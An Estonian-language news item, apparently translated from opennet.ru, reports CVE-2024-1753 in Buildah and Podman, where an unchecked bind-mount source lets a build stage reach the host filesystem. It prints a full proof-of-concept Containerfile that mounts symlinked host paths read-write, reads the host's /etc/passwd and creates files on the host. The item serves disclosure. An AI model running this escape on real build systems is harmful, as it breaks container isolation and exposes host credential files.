Haavatavus Buildah'is ja Podman'is, mis võimaldab konteineri isolatsiooni ümber minna

Buildah ja Podman pakettides leiti haavatavus (CVE-2024-1753), mis võimaldab saada täielikku ligipääsu host-ümbriku failisüsteemile konteineri koostamise etapis, kui konteinerit käivitatakse root-õigustega. Süsteemides, kus on sisse lülitatud SELinux, piiratakse ligipääsu hosti failisüsteemile ainult lugemisrežiimiga. Parandus on hetkel saadaval plaasina, mis võeti Buildah kodeeringusse mõned minutid tagasi.

Haavatavus tuleneb sellest, et failisüsteemi osade mountimise tegemisel käsklusega «mount —bind» koostamise etapis RUN, ei kontrollita alguskaustaga seotud argumenti (parameeter «source=») juurfailisüsteemis eksisteerimise osas. Tema poolt kujundatud kurjategija konfiguratsioonifail Containerfile võib kasutada konteineri pilti, kus kaust, mida mountida, on kujundatud sümboolse lingina juurfailisüsteemile. Sel juhul toob mountimise toiming kaasa host-ümbriku juurfailisüsteemi mountimise konteinerisse, mis võimaldab RUN-etapis saada täielikku ligipääsu host-ümbriku failisüsteemile ja korraldada väljandumist konteinerist koostamise ajal käsklustega «buildah build» või «podman build».

Kuritahtlik Containerfile'i fail, mille koostamine käsklusega «podman build -f ~\/Containerfile .» toob kaasa /etc/passwd sisu kuvamise ja failide /BIND_BREAKEOUT ja /etc/BIND_BREAKOUT2 loomise host-ümbrikus: FROM alpine as base RUN ln -s \/ \/rootdir RUN ln -s \/etc \/etc2 FROM alpine RUN echo «ls container root» RUN ls -l \/ RUN echo «Kuritahtlikul näidatakse hosti root'it, mitte konteineri root'i, ja luuakse \/BIND_BREAKOUT \/ hostis» RUN —mount=type=bind,from=base,source=\/rootdir,destination=\/exploit,rw ls -l \/exploit; touch \/exploit\/BIND_BREAKOUT; ls -l \/exploit RUN echo «Kuritahtlikul näidatakse hosti \/etc/passwd, mitte konteineri, ja luuakse \/BIND_BREAKOUT2 \/etc hostis» RUN —mount=type=bind,rw,source=\/etc2,destination=\/etc2,from=base ls -l \/; ls -l \/etc2\/passwd; cat \/etc2\/passwd; touch \/etc2\/BIND_BREAKOUT2; ls -l \/etc2

Allikas: opennet.ru

Osta usaldusväärne hostimine veebilehtede jaoks DDoS-i kaitsega, VPS VDS serverid 🔥 Osta usaldusväärne hostimine veebilehtede jaoks DDoS-i kaitsega, VPS VDS serverid | ProHoster